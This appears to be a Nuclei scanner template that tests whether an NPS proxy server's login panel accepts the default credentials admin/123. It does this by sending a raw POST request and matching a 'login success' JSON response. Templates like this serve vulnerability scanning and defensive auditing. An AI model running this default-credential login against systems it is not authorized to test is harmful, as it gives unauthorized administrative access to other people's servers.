id: nps-default-login

info:
  name: NPS Default Login
  author: pikpikcu
  severity: high
  tags: nps,default-login

requests:
  - raw:
      - |
        POST /login/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/login/index

        username={{username}}&password={{password}}

    payloads:
      username:
        - admin
      password:
        - 123
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header
        condition: and
      - type: word
        words:
          - '"msg": "login success"'
          - '"status": 1'
        part: body
        condition: and
      - type: status
        status:
          - 200
